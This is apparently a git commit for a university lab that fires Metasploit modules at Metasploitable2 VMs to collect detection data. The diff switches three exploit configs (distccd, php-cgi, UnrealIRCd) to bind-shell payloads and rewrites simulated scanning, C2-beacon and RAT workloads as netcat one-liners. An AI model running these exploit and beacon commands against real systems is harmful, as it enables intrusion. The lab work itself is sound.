Solvable Tier-3 holes: callback payloads, busybox workloads, bridge by default

Closes the next batch of issues from the post-mortem. The previous
"each run uses a different vulnerability" commit shipped 5 modules
but 3 of them couldn't actually fire under SLIRP+restrict=on:
their reverse-shell payloads needed a callback channel the launcher
didn't provide, AND their LHOST options were set to {{ target_ip }}
(the target's IP, not the attacker's — copy-paste from RHOSTS).
Same time, the workloads.py shell commands used bash-only /dev/tcp
redirects that silently no-op'd in the busybox shell sessions
Metasploitable2 returns. Net effect: episodes that selected those
modules would have produced session_open_timeout + dead workloads.

Module configs (the three callback ones):
  exploits/modules/distccd_command_exec.toml
  exploits/modules/php_cgi_arg_injection.toml
  exploits/modules/unreal_ircd_3281_backdoor.toml
    - Switch payload from cmd/unix/reverse* to cmd/unix/bind_perl
      so the target listens on a known port; msfrpcd connects to it
      via the host's hostfwd (no callback path required).
    - Drop the bogus LHOST = "{{ target_ip }}" — bind shells don't
      use LHOST.
    - Add [runtime] table:
        requires_bridge = true
        extra_target_ports = [<bind_lport>]
      Both fields are honored by the loader (ModuleConfig.requires_bridge)
      and the launcher (TARGET_PORTS gets the extra port hostfwd'd
      when BRIDGE mode is active).

orchestrator/fleet.py
  When BRIDGE is unset in env, _run_slot filters the module catalog
  down to modules where requires_bridge=False before calling
  select_module. Two same-socket-shell modules (vsftpd_234_backdoor +
  samba_usermap_script) survive — fleet still has variety; just
  doesn't pick modules whose payloads can't land. With BRIDGE set,
  the full catalog rotates as before, AND BRIDGE is propagated to
  the per-slot subprocess env so launch_target.sh enters tap+bridge
  mode.

exploits/workloads.py
  Replaced bash-only constructs in three profiles:
    scan-and-dial  /dev/tcp/HOST/PORT redirects → nc -z -w 1
    bursty-c2      same fix
    shell-resident exec 3<>/dev/tcp/...  → piping into nc -w
  All three now run cleanly in busybox / dash / Metasploitable2's
  default shell. The remaining three profiles (cpu-saturate, io-walk,
  low-and-slow) were already busybox-portable.

scripts/install-lab-host.sh
  - lab-host.env now defaults BRIDGE=br-malware (was commented out).
    Operator opt-out is to comment the line back in.
  - New step 6b: provisions br-malware via vm/setup_bridge.sh AND
    pre-creates a per-slot tap pool (cis490tap0..7 for Tier-2 demo,
    cis490target0..7 for Tier-3 target) all attached to br-malware
    and brought up. Launchers reference these by SLOT — no sudo
    needed at episode time.
  - On bridge-setup failure, the script auto-comments BRIDGE in the
    env file with a "auto-disabled: bridge setup failed" note so
    the fleet falls back to same-socket modules + Tier-2 cleanly.

tools/cis490_doctor.py
  Two new checks for the lab-host role:
    bridge: br-malware exists / up
    tier3: msfrpcd listening on 127.0.0.1:55553
    tier3: module catalog parses (counts same-socket vs requires_bridge)
  All three are warn-level — they don't fail an otherwise-healthy
  Tier-2-only setup; they tell the operator what's missing for full
  Tier-3 + source 4 coverage.

Tests: 132 (was 129). New cases:
  test_fleet.py +3
    - fleet skips requires_bridge modules when BRIDGE unset (asserted
      across 20 episodes; never picks a callback module)
    - fleet uses the full catalog when BRIDGE is set
    - BRIDGE env propagates to per-slot subprocess

What's still untested live: the bind_perl payloads against a real
Metasploitable2 in the bridge-enabled launcher path. That's a
deployment validation, not a code change. The unit tests confirm
the dispatch / filter logic; the live test is the next operator
action.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This commit is contained in:
max 2026-04-30 02:32:52 -05:00
parent a193d17ead
commit 507eac617b
9 changed files with 230 additions and 25 deletions

View file

@ -40,6 +40,11 @@ class ModuleConfig:
payload_options: dict[str, Any] = field(default_factory=dict)
expected_session_type: str = "shell" # what we'll get on success
description: str = ""
# When true the module's payload uses a callback channel (reverse
# or bind shell) and won't land a session under SLIRP+restrict=on.
# The fleet runner skips these unless BRIDGE is set so episodes
# that fire them actually produce data.
requires_bridge: bool = False
def render_options(self, *, target_ip: str) -> dict[str, Any]:
"""Substitute ``{{ target_ip }}`` placeholders in options.
@ -93,6 +98,7 @@ def load_module_config(path: Path) -> ModuleConfig:
payload_options=dict(payload.get("options") or {}),
expected_session_type=raw.get("session", {}).get("type", "shell"),
description=raw.get("description", ""),
requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
)

View file

@ -16,10 +16,21 @@ RHOSTS = "{{ target_ip }}"
RPORT = 3632
[payload]
path = "cmd/unix/reverse"
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LHOST = "{{ target_ip }}"
LPORT = 4444
[session]
type = "shell"
[runtime]
# Reverse/bind callback path → needs the host-only bridge so the
# guest can reach the attacker (or the host can reach the bind port
# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
# lab host to enable.
requires_bridge = true
extra_target_ports = [4444]

View file

@ -16,10 +16,13 @@ RPORT = 80
TARGETURI = "/"
[payload]
path = "cmd/unix/reverse_perl"
path = "cmd/unix/bind_perl"
[payload.options]
LHOST = "{{ target_ip }}"
LPORT = 4445
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4445]

View file

@ -16,10 +16,13 @@ RHOSTS = "{{ target_ip }}"
RPORT = 6667
[payload]
path = "cmd/unix/reverse"
path = "cmd/unix/bind_perl"
[payload.options]
LHOST = "{{ target_ip }}"
LPORT = 4446
[session]
type = "shell"
[runtime]
requires_bridge = true
extra_target_ports = [4446]

View file

@ -111,14 +111,19 @@ def _cpu_saturate() -> Workload:
def _scan_and_dial() -> Workload:
"""Mirai-class — TCP SYN-style probe of bridge subnet + occasional
"dial home" to the gateway. Heavy net, moderate CPU."""
"dial home" to the gateway. Heavy net, moderate CPU.
Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
latter is bash-only and silently no-ops on busybox / dash, which
is what Metasploitable2 and Alpine guest sessions actually run.
Falls back to a TCP-via-python one-liner if nc isn't available."""
body = (
" for i in 1 2 3 4 5 6 7 8 9 10; do\n"
" (echo > /dev/tcp/10.200.0.$((i+1))/23) 2>/dev/null &\n"
" (echo > /dev/tcp/10.200.0.$((i+1))/2323) 2>/dev/null &\n"
" nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
" nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
" done\n"
" wait\n"
" (echo dial-home > /dev/tcp/10.200.0.1/4444) 2>/dev/null\n"
" echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
" sleep 2\n"
)
w = _wrap_loop("scan-and-dial", body)
@ -151,11 +156,11 @@ def _io_walk() -> Workload:
def _bursty_c2() -> Workload:
"""Dridex-class — long idle, periodic small TCP burst to a fixed
peer (the bridge gateway)."""
peer (the bridge gateway). nc-based for busybox compatibility."""
body = (
" sleep 25\n"
" for i in 1 2 3; do\n"
" (echo c2-beacon-$$-$i > /dev/tcp/10.200.0.1/4445) 2>/dev/null\n"
" echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
" sleep 1\n"
" done\n"
)
@ -186,18 +191,18 @@ def _low_and_slow() -> Workload:
def _shell_resident() -> Workload:
"""RAT-style — keep a single TCP socket open to the gateway with
occasional command bursts. Long-lived flow, small bytes."""
# nc on Metasploitable2 is GNU netcat; on busybox it's also there.
# We use plain bash /dev/tcp redirects to avoid depending on nc.
"""RAT-style — keep a single TCP connection open to the gateway
with occasional command bursts. Long-lived flow, small bytes.
Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
feed into nc so the connection stays open for ~30 s before the
-w idle timeout closes it, matching the long-lived-flow shape.
Then we sleep + reconnect, producing the periodic-tick pattern."""
body = (
" exec 3<>/dev/tcp/10.200.0.1/4446 2>/dev/null && {\n"
" for i in 1 2 3 4 5 6; do\n"
" echo cmd-tick-$i >&3\n"
" ( for i in 1 2 3 4 5 6; do\n"
" echo cmd-tick-$i\n"
" sleep 5\n"
" done\n"
" exec 3<&-; exec 3>&-\n"
" }\n"
" done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
" sleep 5\n"
)
w = _wrap_loop("shell-resident", body)

View file

@ -237,9 +237,25 @@ def _run_slot(
run_dir_base = "/tmp/cis490-vm-fleet"
# Decide tier.
bridge_iface = os.environ.get("BRIDGE") or None
# Filter the catalog to modules that can actually fire under the
# current launcher mode. Reverse / bind shells require the host-
# only bridge (no SLIRP+restrict=on guest egress), so skip those
# when BRIDGE isn't set; otherwise the exploit fires but the
# session never lands and the episode degenerates to a 30 s
# session_open_timeout.
if cfg.modules:
if bridge_iface:
usable_modules = dict(cfg.modules)
else:
usable_modules = {
k: v for k, v in cfg.modules.items() if not v.requires_bridge
}
else:
usable_modules = {}
tier3_ready = (
not cfg.force_tier2
and bool(cfg.modules)
and bool(usable_modules)
and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
)
@ -261,7 +277,7 @@ def _run_slot(
if tier3_ready:
module = select_module(
cfg.modules,
usable_modules,
host_id=cfg.host_id, slot=slot, episode_index=episode_index,
)
target_port = module_target_port(module) or 21
@ -271,6 +287,8 @@ def _run_slot(
# Each slot gets a unique host-side hostfwd port so concurrent
# targets don't collide on the loopback port.
env["PORT_BASE"] = str(target_port + slot * 1000)
if bridge_iface:
env["BRIDGE"] = bridge_iface
cmd = [
py,
str(cfg.repo_root / "tools" / "run_tier3_demo.py"),

View file

@ -108,10 +108,44 @@ if [[ ! -f "$ENV_FILE" ]]; then
install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
# Read by cis490-orchestrator.service. Override per-host as needed.
FLEET_HOST_ID=$DEFAULT_HOST_ID
# BRIDGE=br-malware # uncomment to enable source 4 pcap capture
# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
# Tier-3 modules whose payloads need callback (reverse/bind shells).
# install-lab-host.sh provisions the bridge + tap pool below; leave
# this on unless your lab host can't run NETLINK ops.
BRIDGE=br-malware
EOF
fi
# --- 6b. host-only bridge + per-slot tap pool --------------------------
# br-malware lets pcap capture the guest traffic and lets bind/reverse
# shell payloads route between guest and host. We pre-create a small
# pool of taps so the launchers don't need sudo to attach interfaces;
# each slot uses cis490tap{SLOT,SLOT+100} (Tier-2 demo + Tier-3
# target). Idempotent: re-running on an already-set-up host is a
# no-op.
if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
log "bridge br-malware ready"
for n in 0 1 2 3 4 5 6 7; do
for prefix in cis490tap cis490target; do
tap="${prefix}${n}"
if ! ip link show "$tap" >/dev/null 2>&1; then
ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
ip tuntap add dev "$tap" mode tap 2>/dev/null || true
ip link set "$tap" master br-malware 2>/dev/null || true
ip link set "$tap" up 2>/dev/null || true
fi
done
done
log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
else
log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
# Comment out BRIDGE in the env file — fleet will still run
# Tier-2 + non-callback Tier-3 modules.
sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware # auto-disabled: bridge setup failed/' "$ENV_FILE"
fi
fi
# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
# already on disk. Trust boundary: "reached bootstrap.wg over WG"

View file

@ -296,6 +296,67 @@ def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
assert res.tier == "tier2"
def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
"""Fleet must filter out callback-payload modules when BRIDGE is
unset otherwise the exploit fires but the session never lands
and the episode degenerates to a 30 s session_open_timeout."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.delenv("BRIDGE", raising=False)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen_modules = set()
for ep in range(20):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen_modules.add(res.module_name)
# Every selected module must be callback-free (same-socket).
callback_modules = {
m.name for m in cfg.modules.values() if m.requires_bridge
}
assert callback_modules, "test setup error: expected some require_bridge modules"
assert not (seen_modules & callback_modules), \
f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
"""With BRIDGE set, the full catalog (including reverse/bind shell
payloads) is in rotation."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen = set()
for ep in range(40):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen.add(res.module_name)
assert seen == set(cfg.modules.keys()), \
f"only saw {seen}/{set(cfg.modules.keys())}"
def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
"""When BRIDGE is set in the parent env, the per-slot subprocess
env must carry it through so launch_target.sh enters tap+bridge mode."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
"""Concurrent Tier-3 slots can't share the host-side hostfwd port
or all targets stomp on each other's vsftpd:21 → 21 mapping. The

View file

@ -467,6 +467,44 @@ def check_tier3(report: Report) -> None:
else:
report.add(Check("tier3: msfrpcd on PATH", "ok"))
# Probe whether msfrpcd is actually listening (tier-3 fleet
# dispatch checks the same thing).
msfrpcd_listening = False
try:
with socket.create_connection(("127.0.0.1", 55553), timeout=0.5):
msfrpcd_listening = True
except OSError:
pass
if msfrpcd_listening:
report.add(Check("tier3: msfrpcd listening on 127.0.0.1:55553", "ok"))
else:
report.add(Check(
"tier3: msfrpcd listening on 127.0.0.1:55553",
"warn",
detail="optional — fleet falls back to Tier 2 when down",
fix="sudo systemctl enable --now cis490-msfrpcd",
))
# Module catalog parses + at least one same-socket entry.
modules_dir = Path("/opt/cis490/exploits/modules")
if modules_dir.exists():
try:
from exploits.modules import load_module_configs as _load
catalog = _load(modules_dir)
same_socket = [k for k, v in catalog.items() if not v.requires_bridge]
report.add(Check(
"tier3: module catalog parses",
"ok",
detail=f"{len(catalog)} modules, {len(same_socket)} same-socket "
f"({len(catalog) - len(same_socket)} need BRIDGE)",
))
except Exception as e:
report.add(Check(
"tier3: module catalog parses",
"fail",
detail=str(e),
fix="check exploits/modules/*.toml syntax",
))
images = Path("/var/lib/cis490/vm/images")
msf2 = images / "metasploitable2.qcow2"
if _path_exists(msf2):
@ -481,6 +519,31 @@ def check_tier3(report: Report) -> None:
))
def check_bridge(report: Report) -> None:
"""Bridge readiness — pcap (source 4) + reverse/bind callback
payloads both need this. Without it, Tier-3 episodes that pick
callback modules will fire but the session never lands."""
rc, out, _ = _run(["ip", "-br", "link", "show", "br-malware"])
if rc == 0 and "br-malware" in out:
if "UP" in out or "UNKNOWN" in out:
report.add(Check("bridge: br-malware up", "ok", detail=out.strip()[:80]))
else:
report.add(Check(
"bridge: br-malware up",
"warn",
detail=out.strip()[:80],
fix="sudo ip link set br-malware up",
))
else:
report.add(Check(
"bridge: br-malware exists",
"warn",
detail="optional — pcap capture + callback-payload Tier-3 "
"modules require it",
fix="sudo /opt/cis490/vm/setup_bridge.sh",
))
# ---------------------------------------------------------------------------
# checks — end to end (lab-host)
# ---------------------------------------------------------------------------
@ -537,6 +600,7 @@ def main(argv: list[str] | None = None) -> int:
if args.role == "lab-host":
check_network_lab_host(report, Path("/etc/cis490/lab-host.toml"))
check_vm_prereqs(report)
check_bridge(report)
if not args.no_tier3:
check_tier3(report)
check_end_to_end(report)